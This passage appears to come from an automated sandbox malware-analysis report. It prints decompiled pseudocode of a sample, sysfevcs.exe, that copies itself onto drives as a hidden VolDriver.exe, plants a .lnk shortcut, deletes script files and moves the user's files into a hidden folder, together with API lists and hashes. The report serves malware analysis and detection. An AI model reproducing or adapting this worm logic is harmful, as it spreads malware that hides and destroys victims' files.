                                                                                                                                                                                                                                                                  				intOrPtr _v4808;
                                                                                                                                                                                                                                                                  				WCHAR* _v4812;
                                                                                                                                                                                                                                                                  				WCHAR* _v4816;
                                                                                                                                                                                                                                                                  				WCHAR* _v4820;
                                                                                                                                                                                                                                                                  				WCHAR* _v4824;
                                                                                                                                                                                                                                                                  				WCHAR* _v4828;
                                                                                                                                                                                                                                                                  				WCHAR* _v4832;
                                                                                                                                                                                                                                                                  				WCHAR* _v4836;
                                                                                                                                                                                                                                                                  				WCHAR* _v4840;
                                                                                                                                                                                                                                                                  				WCHAR* _v4844;
                                                                                                                                                                                                                                                                  				WCHAR* _v4848;
                                                                                                                                                                                                                                                                  				WCHAR* _v4852;
                                                                                                                                                                                                                                                                  				WCHAR* _v4856;
                                                                                                                                                                                                                                                                  				WCHAR* _v4860;
                                                                                                                                                                                                                                                                  				signed char _v4861;
                                                                                                                                                                                                                                                                  				signed char _v4862;
                                                                                                                                                                                                                                                                  				signed int _v4868;
                                                                                                                                                                                                                                                                  				signed int _v4872;
                                                                                                                                                                                                                                                                  				intOrPtr _t167;
                                                                                                                                                                                                                                                                  				intOrPtr _t195;
                                                                                                                                                                                                                                                                  				void* _t218;
                                                                                                                                                                                                                                                                  				void* _t219;
                                                                                                                                                                                                                                                                  				void* _t224;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				L0040EB2A();
                                                                                                                                                                                                                                                                  				if((_a12 & 0x00080000) != 0) {
                                                                                                                                                                                                                                                                  					return 0;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v2088 = 0x412c2c;
                                                                                                                                                                                                                                                                  				_v3133 = 0;
                                                                                                                                                                                                                                                                  				wsprintfW( &_v1564, L"%s.lnk", _a8);
                                                                                                                                                                                                                                                                  				wsprintfW( &_v4252, L"%s\\%s", _a4, _v2088);
                                                                                                                                                                                                                                                                  				wsprintfW( &_v4780, L"%s\\%s\\VolDriver.exe", _a4, _v2088);
                                                                                                                                                                                                                                                                  				wsprintfW( &_v2612, L"%s\\%s", _a4,  &_v1564);
                                                                                                                                                                                                                                                                  				wsprintfW( &_v1044, L"%s\\*", _a4);
                                                                                                                                                                                                                                                                  				_t224 = _t219 + 0x48;
                                                                                                                                                                                                                                                                  				if(PathFileExistsW( &_v4780) != 0) {
                                                                                                                                                                                                                                                                  					_t167 = E0040CEA0( &_v4780);
                                                                                                                                                                                                                                                                  					_t224 = _t224 + 4;
                                                                                                                                                                                                                                                                  					_v4784 = _t167;
                                                                                                                                                                                                                                                                  					_t195 =  *0x412f70; // 0x12400
                                                                                                                                                                                                                                                                  					if(_t195 != _v4784) {
                                                                                                                                                                                                                                                                  						SetFileAttributesW( &_v4780, 0x80);
                                                                                                                                                                                                                                                                  						DeleteFileW( &_v4780);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				if(PathFileExistsW( &_v4780) == 0) {
                                                                                                                                                                                                                                                                  					if(PathFileExistsW( &_v4252) == 0 && CreateDirectoryW( &_v4252, 0) != 0) {
                                                                                                                                                                                                                                                                  						SetFileAttributesW( &_v4252, 2);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					if(PathFileExistsW( &_v4252) != 0 && CopyFileW(L"C:\\Windows\\sysfevcs.exe",  &_v4780, 0) != 0) {
                                                                                                                                                                                                                                                                  						SetFileAttributesW( &_v4780, 2);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				if(PathFileExistsW( &_v2612) == 0) {
                                                                                                                                                                                                                                                                  					if((_a16 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  						E00404AA0( &_v2612, L"shell32.dll", 8);
                                                                                                                                                                                                                                                                  						_t224 = _t224 + 0xc;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						E00404AA0( &_v2612, L"shell32.dll", 9);
                                                                                                                                                                                                                                                                  						_t224 = _t224 + 0xc;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					SetFileAttributesW( &_v2612, 1);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v4256 = FindFirstFileW( &_v1044,  &_v3732);
                                                                                                                                                                                                                                                                  				if(_v4256 == 0xffffffff) {
                                                                                                                                                                                                                                                                  					L45:
                                                                                                                                                                                                                                                                  					return _v3133;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_v4860 = L"*.lnk";
                                                                                                                                                                                                                                                                  					_v4856 = L"*.vbs";
                                                                                                                                                                                                                                                                  					_v4852 = L"*.js";
                                                                                                                                                                                                                                                                  					_v4848 = L"*.scr";
                                                                                                                                                                                                                                                                  					_v4844 = L"*.com";
                                                                                                                                                                                                                                                                  					_v4840 = L"*.jse";
                                                                                                                                                                                                                                                                  					_v4836 = L"*.cmd";
                                                                                                                                                                                                                                                                  					_v4832 = L"*.pif";
                                                                                                                                                                                                                                                                  					_v4828 = L"*.jar";
                                                                                                                                                                                                                                                                  					_v4824 = L"*.dll";
                                                                                                                                                                                                                                                                  					_v4820 = L"*.vbe";
                                                                                                                                                                                                                                                                  					_v4816 = L"*.bat";
                                                                                                                                                                                                                                                                  					_v4812 = L"*.inf";
                                                                                                                                                                                                                                                                  					_v4808 = _v2088;
                                                                                                                                                                                                                                                                  					_v4804 =  &_v1564;
                                                                                                                                                                                                                                                                  					_v4800 = L"Thumbs.db";
                                                                                                                                                                                                                                                                  					_v4796 = L"$RECYCLE.BIN";
                                                                                                                                                                                                                                                                  					_v4792 = L"desktop.ini";
                                                                                                                                                                                                                                                                  					_v4788 = L"System Volume Information";
                                                                                                                                                                                                                                                                  					do {
                                                                                                                                                                                                                                                                  						if(lstrcmpW( &(_v3732.cFileName), ".") != 0 && lstrcmpW( &(_v3732.cFileName), L"..") != 0) {
                                                                                                                                                                                                                                                                  							_v4862 = 0;
                                                                                                                                                                                                                                                                  							_v4868 = 0;
                                                                                                                                                                                                                                                                  							while(_v4868 < 6) {
                                                                                                                                                                                                                                                                  								if(lstrcmpiW( &(_v3732.cFileName),  *(_t218 + _v4868 * 4 - 0x12c4)) == 0) {
                                                                                                                                                                                                                                                                  									_v4862 = 1;
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_v4868 = _v4868 + 1;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							if((_v4862 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  								_v4861 = 0;
                                                                                                                                                                                                                                                                  								_v4872 = 0;
                                                                                                                                                                                                                                                                  								while(_v4872 < 0xd) {
                                                                                                                                                                                                                                                                  									if(PathMatchSpecW( &(_v3732.cFileName),  *(_t218 + _v4872 * 4 - 0x12f8)) != 0) {
                                                                                                                                                                                                                                                                  										wsprintfW( &_v2084, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                                                                                                                                                                                                  										_t224 = _t224 + 0x10;
                                                                                                                                                                                                                                                                  										SetFileAttributesW( &_v2084, 0x80);
                                                                                                                                                                                                                                                                  										DeleteFileW( &_v2084);
                                                                                                                                                                                                                                                                  										_v4861 = 1;
                                                                                                                                                                                                                                                                  										break;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_v4872 = _v4872 + 1;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								if((_v4861 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  									if(PathFileExistsW( &_v4252) != 0) {
                                                                                                                                                                                                                                                                  										wsprintfW( &_v3132, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                                                                                                                                                                                                  										wsprintfW( &_v524, L"%s\\%s\\%s", _a4, _v2088,  &(_v3732.cFileName));
                                                                                                                                                                                                                                                                  										_t224 = _t224 + 0x24;
                                                                                                                                                                                                                                                                  										if((_v3732.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                  											MoveFileExW( &_v3132,  &_v524, 9);
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											E00404BB0( &_v3132,  &_v524);
                                                                                                                                                                                                                                                                  											_t224 = _t224 + 8;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								goto L43;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						L43:
                                                                                                                                                                                                                                                                  					} while (FindNextFileW(_v4256,  &_v3732) != 0);
                                                                                                                                                                                                                                                                  					FindClose(_v4256);
                                                                                                                                                                                                                                                                  					goto L45;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}












































                                                                                                                                                                                                                                                                  0x00404cf8
                                                                                                                                                                                                                                                                  0x00404d05
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404d07
                                                                                                                                                                                                                                                                  0x00404d0e
                                                                                                                                                                                                                                                                  0x00404d18
                                                                                                                                                                                                                                                                  0x00404d2f
                                                                                                                                                                                                                                                                  0x00404d4f
                                                                                                                                                                                                                                                                  0x00404d6f
                                                                                                                                                                                                                                                                  0x00404d8f
                                                                                                                                                                                                                                                                  0x00404da8
                                                                                                                                                                                                                                                                  0x00404dae
                                                                                                                                                                                                                                                                  0x00404dc0
                                                                                                                                                                                                                                                                  0x00404dc9
                                                                                                                                                                                                                                                                  0x00404dce
                                                                                                                                                                                                                                                                  0x00404dd1
                                                                                                                                                                                                                                                                  0x00404dd7
                                                                                                                                                                                                                                                                  0x00404de3
                                                                                                                                                                                                                                                                  0x00404df1
                                                                                                                                                                                                                                                                  0x00404dfe
                                                                                                                                                                                                                                                                  0x00404dfe
                                                                                                                                                                                                                                                                  0x00404de3
                                                                                                                                                                                                                                                                  0x00404e13
                                                                                                                                                                                                                                                                  0x00404e24
                                                                                                                                                                                                                                                                  0x00404e42
                                                                                                                                                                                                                                                                  0x00404e42
                                                                                                                                                                                                                                                                  0x00404e57
                                                                                                                                                                                                                                                                  0x00404e7a
                                                                                                                                                                                                                                                                  0x00404e7a
                                                                                                                                                                                                                                                                  0x00404e57
                                                                                                                                                                                                                                                                  0x00404e8f
                                                                                                                                                                                                                                                                  0x00404e97
                                                                                                                                                                                                                                                                  0x00404ebf
                                                                                                                                                                                                                                                                  0x00404ec4
                                                                                                                                                                                                                                                                  0x00404e99
                                                                                                                                                                                                                                                                  0x00404ea7
                                                                                                                                                                                                                                                                  0x00404eac
                                                                                                                                                                                                                                                                  0x00404eac
                                                                                                                                                                                                                                                                  0x00404ed0
                                                                                                                                                                                                                                                                  0x00404ed0
                                                                                                                                                                                                                                                                  0x00404eea
                                                                                                                                                                                                                                                                  0x00404ef7
                                                                                                                                                                                                                                                                  0x004051bf
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404efd
                                                                                                                                                                                                                                                                  0x00404efd
                                                                                                                                                                                                                                                                  0x00404f07
                                                                                                                                                                                                                                                                  0x00404f11
                                                                                                                                                                                                                                                                  0x00404f1b
                                                                                                                                                                                                                                                                  0x00404f25
                                                                                                                                                                                                                                                                  0x00404f2f
                                                                                                                                                                                                                                                                  0x00404f39
                                                                                                                                                                                                                                                                  0x00404f43
                                                                                                                                                                                                                                                                  0x00404f4d
                                                                                                                                                                                                                                                                  0x00404f57
                                                                                                                                                                                                                                                                  0x00404f61
                                                                                                                                                                                                                                                                  0x00404f6b
                                                                                                                                                                                                                                                                  0x00404f75
                                                                                                                                                                                                                                                                  0x00404f85
                                                                                                                                                                                                                                                                  0x00404f91
                                                                                                                                                                                                                                                                  0x00404f97
                                                                                                                                                                                                                                                                  0x00404fa1
                                                                                                                                                                                                                                                                  0x00404fab
                                                                                                                                                                                                                                                                  0x00404fb5
                                                                                                                                                                                                                                                                  0x00404fbf
                                                                                                                                                                                                                                                                  0x00404fd3
                                                                                                                                                                                                                                                                  0x00404ff0
                                                                                                                                                                                                                                                                  0x00404ff7
                                                                                                                                                                                                                                                                  0x00405012
                                                                                                                                                                                                                                                                  0x00405038
                                                                                                                                                                                                                                                                  0x0040503c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040503c
                                                                                                                                                                                                                                                                  0x0040500c
                                                                                                                                                                                                                                                                  0x0040500c
                                                                                                                                                                                                                                                                  0x00405050
                                                                                                                                                                                                                                                                  0x00405057
                                                                                                                                                                                                                                                                  0x0040505e
                                                                                                                                                                                                                                                                  0x00405079
                                                                                                                                                                                                                                                                  0x0040509f
                                                                                                                                                                                                                                                                  0x004050ba
                                                                                                                                                                                                                                                                  0x004050c0
                                                                                                                                                                                                                                                                  0x004050cf
                                                                                                                                                                                                                                                                  0x004050dc
                                                                                                                                                                                                                                                                  0x004050e2
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004050e2
                                                                                                                                                                                                                                                                  0x00405073
                                                                                                                                                                                                                                                                  0x00405073
                                                                                                                                                                                                                                                                  0x004050f9
                                                                                                                                                                                                                                                                  0x0040510f
                                                                                                                                                                                                                                                                  0x0040512d
                                                                                                                                                                                                                                                                  0x00405154
                                                                                                                                                                                                                                                                  0x0040515a
                                                                                                                                                                                                                                                                  0x00405166
                                                                                                                                                                                                                                                                  0x00405190
                                                                                                                                                                                                                                                                  0x00405168
                                                                                                                                                                                                                                                                  0x00405176
                                                                                                                                                                                                                                                                  0x0040517b
                                                                                                                                                                                                                                                                  0x0040517b
                                                                                                                                                                                                                                                                  0x00405166
                                                                                                                                                                                                                                                                  0x0040510f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004050f9
                                                                                                                                                                                                                                                                  0x00405052
                                                                                                                                                                                                                                                                  0x00405196
                                                                                                                                                                                                                                                                  0x004051aa
                                                                                                                                                                                                                                                                  0x004051b9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004051b9

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _chkstk.NTDLL(?,00405340,?,?,?), ref: 00404CF8
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404D2F
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404D4F
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404D6F
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404D8F
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404DA8
                                                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404DB8
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 00404DF1
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00404DFE
                                                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404E0B
                                                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404E1C
                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00404E2F
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000002), ref: 00404E42
                                                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404E4F
                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(C:\Windows\sysfevcs.exe,?,00000000), ref: 00404E67
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000002), ref: 00404E7A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$wsprintf$ExistsPath$Attributes$CopyCreateDeleteDirectory_chkstk
                                                                                                                                                                                                                                                                  • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDriver.exe$%s\*$,,A$C:\Windows\sysfevcs.exe$shell32.dll$shell32.dll
                                                                                                                                                                                                                                                                  • API String ID: 3833403615-3064146888
                                                                                                                                                                                                                                                                  • Opcode ID: fe551baaaed48645d904588363baa8fbaef1bbeba22468993180c2cc8ffb09a2
                                                                                                                                                                                                                                                                  • Instruction ID: ad37720c555eb0932884b17657b7396cff93d0f2d5161226f8479edb68281811
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe551baaaed48645d904588363baa8fbaef1bbeba22468993180c2cc8ffb09a2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76D15DB59102189BDB20DF60DD44BEA77B8BF44304F0085FAE109B6581D7B89BD9CF99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00404BB0(WCHAR* _a4, char _a8) {
                                                                                                                                                                                                                                                                  				short _v524;
                                                                                                                                                                                                                                                                  				struct _WIN32_FIND_DATAW _v1116;
                                                                                                                                                                                                                                                                  				void* _v1120;
                                                                                                                                                                                                                                                                  				short _v1644;
                                                                                                                                                                                                                                                                  				short _v2164;
                                                                                                                                                                                                                                                                  				void* _t29;
                                                                                                                                                                                                                                                                  				void* _t60;
                                                                                                                                                                                                                                                                  				void* _t61;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t1 =  &_a8; // 0x40517b
                                                                                                                                                                                                                                                                  				CreateDirectoryW( *_t1, 0);
                                                                                                                                                                                                                                                                  				wsprintfW( &_v524, L"%s\\*", _a4);
                                                                                                                                                                                                                                                                  				_t61 = _t60 + 0xc;
                                                                                                                                                                                                                                                                  				_t29 = FindFirstFileW( &_v524,  &_v1116);
                                                                                                                                                                                                                                                                  				_v1120 = _t29;
                                                                                                                                                                                                                                                                  				if(_v1120 == 0xffffffff) {
                                                                                                                                                                                                                                                                  					return _t29;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					goto L1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				do {
                                                                                                                                                                                                                                                                  					L1:
                                                                                                                                                                                                                                                                  					if(lstrcmpW( &(_v1116.cFileName), ".") != 0 && lstrcmpW( &(_v1116.cFileName), L"..") != 0) {
                                                                                                                                                                                                                                                                  						wsprintfW( &_v1644, L"%s\\%s", _a4,  &(_v1116.cFileName));
                                                                                                                                                                                                                                                                  						_t14 =  &_a8; // 0x40517b
                                                                                                                                                                                                                                                                  						wsprintfW( &_v2164, L"%s\\%s",  *_t14,  &(_v1116.cFileName));
                                                                                                                                                                                                                                                                  						_t61 = _t61 + 0x20;
                                                                                                                                                                                                                                                                  						if((_v1116.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                  							MoveFileExW( &_v1644,  &_v2164, 9);
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							E00404BB0( &_v1644,  &_v2164);
                                                                                                                                                                                                                                                                  							_t61 = _t61 + 8;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				} while (FindNextFileW(_v1120,  &_v1116) != 0);
                                                                                                                                                                                                                                                                  				FindClose(_v1120);
                                                                                                                                                                                                                                                                  				return RemoveDirectoryW(_a4);
                                                                                                                                                                                                                                                                  			}











                                                                                                                                                                                                                                                                  0x00404bbb
                                                                                                                                                                                                                                                                  0x00404bbf
                                                                                                                                                                                                                                                                  0x00404bd5
                                                                                                                                                                                                                                                                  0x00404bdb
                                                                                                                                                                                                                                                                  0x00404bec
                                                                                                                                                                                                                                                                  0x00404bf2
                                                                                                                                                                                                                                                                  0x00404bff
                                                                                                                                                                                                                                                                  0x00404ce2
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404c05
                                                                                                                                                                                                                                                                  0x00404c05
                                                                                                                                                                                                                                                                  0x00404c19
                                                                                                                                                                                                                                                                  0x00404c4a
                                                                                                                                                                                                                                                                  0x00404c5a
                                                                                                                                                                                                                                                                  0x00404c6a
                                                                                                                                                                                                                                                                  0x00404c70
                                                                                                                                                                                                                                                                  0x00404c7c
                                                                                                                                                                                                                                                                  0x00404ca6
                                                                                                                                                                                                                                                                  0x00404c7e
                                                                                                                                                                                                                                                                  0x00404c8c
                                                                                                                                                                                                                                                                  0x00404c91
                                                                                                                                                                                                                                                                  0x00404c91
                                                                                                                                                                                                                                                                  0x00404c7c
                                                                                                                                                                                                                                                                  0x00404cc0
                                                                                                                                                                                                                                                                  0x00404ccf
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32({Q@,00000000), ref: 00404BBF
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404BD5
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00404BEC
                                                                                                                                                                                                                                                                  • lstrcmpW.KERNEL32(?,004105FC), ref: 00404C11
                                                                                                                                                                                                                                                                  • lstrcmpW.KERNEL32(?,00410600), ref: 00404C27
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404C4A
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404C6A
                                                                                                                                                                                                                                                                  • MoveFileExW.KERNEL32(?,?,00000009), ref: 00404CA6
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(000000FF,?), ref: 00404CBA
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 00404CCF
                                                                                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00404CD9
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\%s$%s\*${Q@
                                                                                                                                                                                                                                                                  • API String ID: 92872011-1064697655
                                                                                                                                                                                                                                                                  • Opcode ID: e840542102ed46a4bdf26edd650883959731639ebf51fd0069a4ee6c028d1a6c
                                                                                                                                                                                                                                                                  • Instruction ID: 6f6817d729ebc618073356bb80865953dc886d528bab8797446079342b48442e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e840542102ed46a4bdf26edd650883959731639ebf51fd0069a4ee6c028d1a6c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82317BB5504218EFDB20DFA0DD48EDA7378BB84301F0085B5F609A7585DB74DA99CF98
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040EC4D(long _a4) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                                                                                                                  				short* _v32;
                                                                                                                                                                                                                                                                  				void _v36;
                                                                                                                                                                                                                                                                  				void* _t57;
                                                                                                                                                                                                                                                                  				signed int _t58;
                                                                                                                                                                                                                                                                  				signed int _t61;
                                                                                                                                                                                                                                                                  				signed int _t62;
                                                                                                                                                                                                                                                                  				void* _t63;
                                                                                                                                                                                                                                                                  				signed int* _t68;
                                                                                                                                                                                                                                                                  				intOrPtr* _t69;
                                                                                                                                                                                                                                                                  				intOrPtr* _t71;
                                                                                                                                                                                                                                                                  				intOrPtr _t72;
                                                                                                                                                                                                                                                                  				intOrPtr _t75;
                                                                                                                                                                                                                                                                  				void* _t76;
                                                                                                                                                                                                                                                                  				signed int _t77;
                                                                                                                                                                                                                                                                  				void* _t78;
                                                                                                                                                                                                                                                                  				void _t80;
                                                                                                                                                                                                                                                                  				signed int _t81;
                                                                                                                                                                                                                                                                  				signed int _t84;
                                                                                                                                                                                                                                                                  				signed int _t86;
                                                                                                                                                                                                                                                                  				short* _t87;
                                                                                                                                                                                                                                                                  				void* _t89;
                                                                                                                                                                                                                                                                  				signed int* _t90;
                                                                                                                                                                                                                                                                  				long _t91;
                                                                                                                                                                                                                                                                  				signed int _t93;
                                                                                                                                                                                                                                                                  				signed int _t94;
                                                                                                                                                                                                                                                                  				signed int _t100;
                                                                                                                                                                                                                                                                  				signed int _t102;
                                                                                                                                                                                                                                                                  				void* _t104;
                                                                                                                                                                                                                                                                  				long _t108;
                                                                                                                                                                                                                                                                  				signed int _t110;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t108 = _a4;
                                                                                                                                                                                                                                                                  				_t76 =  *(_t108 + 8);
                                                                                                                                                                                                                                                                  				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                                                                                                  					L3:
                                                                                                                                                                                                                                                                  					return 0;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_a4 =  *[fs:0x4];
                                                                                                                                                                                                                                                                  				_v8 =  *[fs:0x8];
                                                                                                                                                                                                                                                                  				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                                                                                                  					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                                                                                                  					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                                                                                                  					if(_t102 != 0xffffffff) {
                                                                                                                                                                                                                                                                  						_t91 = 0;
                                                                                                                                                                                                                                                                  						__eflags = 0;
                                                                                                                                                                                                                                                                  						_a4 = 0;
                                                                                                                                                                                                                                                                  						_t57 = _t76;
                                                                                                                                                                                                                                                                  						do {
                                                                                                                                                                                                                                                                  							_t80 =  *_t57;
                                                                                                                                                                                                                                                                  							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                                                                                  							if(_t80 == 0xffffffff) {
                                                                                                                                                                                                                                                                  								goto L9;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							__eflags = _t80 - _t91;
                                                                                                                                                                                                                                                                  							if(_t80 >= _t91) {
                                                                                                                                                                                                                                                                  								L20:
                                                                                                                                                                                                                                                                  								_t63 = 0;
                                                                                                                                                                                                                                                                  								L60:
                                                                                                                                                                                                                                                                  								return _t63;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							L9:
                                                                                                                                                                                                                                                                  							__eflags =  *(_t57 + 4);
                                                                                                                                                                                                                                                                  							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                                                                                                  								_t12 =  &_a4;
                                                                                                                                                                                                                                                                  								 *_t12 = _a4 + 1;
                                                                                                                                                                                                                                                                  								__eflags =  *_t12;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t91 = _t91 + 1;
                                                                                                                                                                                                                                                                  							_t57 = _t57 + 0xc;
                                                                                                                                                                                                                                                                  							__eflags = _t91 - _t102;
                                                                                                                                                                                                                                                                  						} while (_t91 <= _t102);
                                                                                                                                                                                                                                                                  						__eflags = _a4;
                                                                                                                                                                                                                                                                  						if(_a4 == 0) {
                                                                                                                                                                                                                                                                  							L15:
                                                                                                                                                                                                                                                                  							_t81 =  *0x4141f0; // 0x0
                                                                                                                                                                                                                                                                  							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                                                                                                  							_t58 = 0;
                                                                                                                                                                                                                                                                  							__eflags = _t81;
                                                                                                                                                                                                                                                                  							if(_t81 <= 0) {
                                                                                                                                                                                                                                                                  								L18:
                                                                                                                                                                                                                                                                  								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                                                                                                  								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                                                                                                  								__eflags = _t61;
                                                                                                                                                                                                                                                                  								if(_t61 < 0) {
                                                                                                                                                                                                                                                                  									_t62 = 0;
                                                                                                                                                                                                                                                                  									__eflags = 0;
                                                                                                                                                                                                                                                                  								} else {
